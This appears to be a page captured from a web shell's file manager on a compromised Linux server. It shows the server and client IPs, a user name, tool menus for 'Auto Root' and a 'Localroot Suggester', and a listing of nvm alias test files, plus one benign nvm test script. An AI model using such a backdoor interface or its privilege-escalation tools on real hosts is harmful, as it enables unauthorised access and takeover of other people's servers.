Linux sg77.dns-private.com 5.14.0-503.40.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Mon May 5 06:06:04 EDT 2025 x86_64
LiteSpeed
Server IP : 135.181.230.13 & Your IP : 216.73.217.69
Domains :
Cant Read [ /etc/named.conf ]
User : pilasate
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
pilasate /
.nvm /
test /
fast /
Aliases /
Delete
Unzip
Name
Size
Permission
Date
Action
circular
[ DIR ]
drwxrwxr-x
2025-06-22 16:20
lts
[ DIR ]
drwxrwxr-x
2025-06-22 16:20
'nvm alias' should ignore leading blank lines in the file
456
B
-rwxrwxr-x
2025-06-22 16:20
'nvm alias' should not accept aliases with a hash
1.32
KB
-rwxrwxr-x
2025-06-22 16:20
'nvm alias' should not accept aliases with slashes
1.29
KB
-rwxrwxr-x
2025-06-22 16:20
'nvm unalias' should accept aliases when they shadow a built-in alias
658
B
-rwxrwxr-x
2025-06-22 16:20
'nvm unalias' should not accept aliases with names equal to built-in alias
1.25
KB
-rwxrwxr-x
2025-06-22 16:20
'nvm unalias' should not accept aliases with slashes
1.28
KB
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm alias ˂aliasname˃ ˂target˃' again should change the target
864
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm alias ˂aliasname˃' should list but one alias
75
B
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm alias' lists implicit aliases when they do not exist
1.22
KB
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm alias' lists manual aliases instead of implicit aliases when present
1.63
KB
-rwxrwxr-x
2025-06-22 16:20
Running 'nvm alias' should list all aliases
2.99
KB
-rwxrwxr-x
2025-06-22 16:20
nvm_ensure_default_set
695
B
-rwxrwxr-x
2025-06-22 16:20
nvm_list_aliases calls nvm_get_colors
514
B
-rwxrwxr-x
2025-06-22 16:20
nvm_list_aliases works with LTS aliases
720
B
-rwxrwxr-x
2025-06-22 16:20
nvm_list_aliases works with no LTS aliases present
375
B
-rwxrwxr-x
2025-06-22 16:20
nvm_print_alias_path calls nvm_get_colors
647
B
-rwxrwxr-x
2025-06-22 16:20
nvm_print_formatted_alias calls nvm_get_colors
648
B
-rwxrwxr-x
2025-06-22 16:20
nvm_resolve_alias
1.62
KB
-rwxrwxr-x
2025-06-22 16:20
nvm_resolve_local_alias
1.51
KB
-rwxrwxr-x
2025-06-22 16:20
setup
334
B
-rwxrwxr-x
2025-06-22 16:20
teardown
492
B
-rwxrwxr-x
2025-06-22 16:20
Save
Rename
#!/bin/sh \. ../../common.sh die () { echo "$@" ; exit 1; } \. ../../../nvm.sh nvm alias default 0.1 >/dev/null || die "'nvm alias default 0.1' failed" nvm_ensure_default_set 0.3 || die "'nvm_ensure_default_set' with an existing default alias exits 0" nvm unalias default || die "'nvm unalias default' failed" OUTPUT="$(nvm_ensure_default_set 0.2)" EXPECTED_OUTPUT="Creating default alias: default -> 0.2 (-> iojs-v0.2.10)" EXIT_CODE="$?" [ "_$(echo "$OUTPUT" | strip_colors)" = "_$EXPECTED_OUTPUT" ] || die "'nvm_ensure_default_set 0.2' did not output '$EXPECTED_OUTPUT', got '$OUTPUT'" [ "_$EXIT_CODE" = "_0" ] || die "'nvm_ensure_default_set 0.2' did not exit with 0, got $EXIT_CODE"